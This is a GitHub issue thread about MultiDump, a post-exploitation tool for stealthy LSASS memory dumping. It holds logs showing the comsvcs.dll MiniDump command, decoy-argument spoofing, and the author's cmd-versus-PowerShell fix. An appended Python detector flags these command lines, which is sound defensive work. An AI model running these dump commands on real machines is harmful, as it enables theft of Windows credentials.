Xre0uS / MultiDump

MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly.

I can't seem to dump the password #5

Closed smxiazi closed 1 month ago

smxiazi commented 1 month ago

\MultiDump-main\Release>MultiDump.exe -r xx.xx.xx.xx:9001

[MultiDump ASCII-art banner]
[+] Found "lsass.exe" - Of PID : 696
[i] Dumping LSASS Using comsvcs.dll...
[i] Target Process Created With Pid : 14196
[!] Failed to Locate LSASS Dump File!

[i] Trying to Dump LSASS Again...
[i] Target Process Created With Pid : 12280
[!] Failed to Locate LSASS Dump File!

[i] Trying to Dump LSASS Again...
[i] Target Process Created With Pid : 14160
[!] Failed to Locate LSASS Dump File!

[i] Trying to Dump LSASS Again...
[i] Target Process Created With Pid : 8840
[!] Failed to Locate LSASS Dump File!

==========
If you use the -REG mode, it works, but you cannot obtain the plaintext password.

smxiazi commented 1 month ago

[+] Found "lsass.exe" - Of PID : 696
[i] Real Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 696 C:\Users\xiazi\AppData\Local\Temp\vqebbs.dmp full
[i] Dummy Command: C:\Windows\System32\rundll32.exe OpenOptimizationControlPanel /cleanup:tempfiles /defrag:all-drives /optimize:startup /schedule:daily /report:debug_file_process_info_20240805_064521.dmp

[i] Dumping LSASS Using comsvcs.dll...
[i] Target Process Created With Pid : 10752
[i] Writing "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 696 C:\Users\xiazi\AppData\Local\Temp\vqebbs.dmp full" As The Process Argument At : 0x00AE04F6 ...
[i] Updating The Length Of The Process Argument From 370 To 64 ...

[i] Reading Dump File and Zeroing Bytes...
[i] Retry Count: 100000
[!] Failed to Locate LSASS Dump File!
[i] LSASS is Running, Continuing...

[i] Trying to Dump LSASS Again...
[i] Target Process Created With Pid : 3820
[i] Writing "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 696 C:\Users\xiazi\AppData\Local\Temp\vqebbs.dmp full" As The Process Argument At : 0x00CA04F6 ...
[i] Updating The Length Of The Process Argument From 370 To 64 ...

[i] Reading Dump File and Zeroing Bytes...
[i] Retry Count: 100000
[!] Failed to Locate LSASS Dump File!
[i] LSASS is Running, Continuing...

[i] Trying to Dump LSASS Again...
[i] Target Process Created With Pid : 11996
[i] Writing "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 696 C:\Users\xiazi\AppData\Local\Temp\vqebbs.dmp full" As The Process Argument At : 0x004404F6 ...
[i] Updating The Length Of The Process Argument From 370 To 64 ...

[i] Reading Dump File and Zeroing Bytes...
[i] Retry Count: 100000
[!] Failed to Locate LSASS Dump File!
[i] LSASS is Running, Continuing...

[i] Trying to Dump LSASS Again...
[i] Target Process Created With Pid : 13756
[i] Writing "C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 696 C:\Users\xiazi\AppData\Local\Temp\vqebbs.dmp full" As The Process Argument At : 0x005804F6 ...
[i] Updating The Length Of The Process Argument From 370 To 64 ...

[i] Reading Dump File and Zeroing Bytes...
[i] Retry Count: 100000
[!] Failed to Locate LSASS Dump File!
[i] LSASS is Running, Continuing...

smxiazi commented 1 month ago

I think I know why: --reg mode can be run from cmd, but the default mode must be run from PowerShell.

Xre0uS commented 1 month ago

Hey, just got around to taking a look at this. Thanks for pointing it out; I didn't really test it with cmd :D

So the issue seems to be with the default method of dumping LSASS using rundll32.exe with comsvcs.dll. By default, MultiDump is using something like this:

C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 720 C:\Users\MalTest\AppData\Local\Temp\iilodm.dmp full

This works in PowerShell but not in cmd. I have no idea why; probably because of the dumb way cmd parses the arguments.

If you have to use cmd, you can use it with --procdump, which is the other dump method; it will have to write ProcDump.exe to disk, of course.

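Added example (not part of MultiDump or of this thread): a small Python classifier for process-creation command lines, run over constructed records built from the command lines quoted above. It flags the comsvcs.dll MiniDump form in both spellings seen here (with and without the comma) and separately flags the decoy command line by its .dmp argument. The event records, PIDs and the function names `classify_rundll32_cmdline` / `scan_events` are my own assumptions.

```python
import re

# Constructed process-creation records (Windows 4688 / Sysmon event 1 style), modelled on
# the command lines quoted in this issue; PIDs are illustrative.
SAMPLE_EVENTS = [
    {"pid": 10752, "cmdline": r"C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 696 C:\Users\xiazi\AppData\Local\Temp\vqebbs.dmp full"},
    {"pid": 3820, "cmdline": r"C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 720 C:\Users\MalTest\AppData\Local\Temp\iilodm.dmp full"},
    # The decoy command line the log above shows being created first: no comsvcs.dll, but a .dmp argument.
    # Creation-time telemetry may only hold this decoy, since the real command is written into the process
    # argument afterwards, so the same classifier is worth re-running on command lines read from the live process list.
    {"pid": 11996, "cmdline": r"C:\Windows\System32\rundll32.exe OpenOptimizationControlPanel /cleanup:tempfiles /defrag:all-drives /optimize:startup /schedule:daily /report:debug_file_process_info_20240805_064521.dmp"},
    {"pid": 4321, "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},  # ordinary rundll32 use
    {"pid": 5555, "cmdline": r"notepad.exe C:\temp\crash.dmp"},                       # not rundll32 at all
]

# comsvcs.dll MiniDump invocation; tolerates the optional comma and mixed case.
COMSVCS_MINIDUMP = re.compile(
    r"comsvcs(?:\.dll)?\s*,?\s*minidump\s+(?P<pid>\d+)\s+(?P<dump>\S+)", re.IGNORECASE)
# Any .dmp path handed to rundll32 is unusual enough to surface on its own.
DMP_ARGUMENT = re.compile(r"\S+\.dmp\b", re.IGNORECASE)


def classify_rundll32_cmdline(cmdline):
    """Return (severity, reason) for a suspicious rundll32 command line, else None."""
    tokens = cmdline.strip().split()
    if not tokens or not tokens[0].strip('"').lower().endswith("rundll32.exe"):
        return None
    m = COMSVCS_MINIDUMP.search(cmdline)
    if m:
        return ("high", f"comsvcs.dll MiniDump of PID {m['pid']} to {m['dump']}")
    if DMP_ARGUMENT.search(cmdline):
        return ("medium", "rundll32 invoked with a .dmp path in its arguments")
    return None


def scan_events(events):
    """Run the classifier over process-creation records; returns (pid, severity, reason) tuples."""
    hits = []
    for ev in events:
        verdict = classify_rundll32_cmdline(ev["cmdline"])
        if verdict is not None:
            hits.append((ev["pid"], *verdict))
    return hits


if __name__ == "__main__":
    for pid, severity, reason in scan_events(SAMPLE_EVENTS):
        print(f"PID {pid}: [{severity}] {reason}")
```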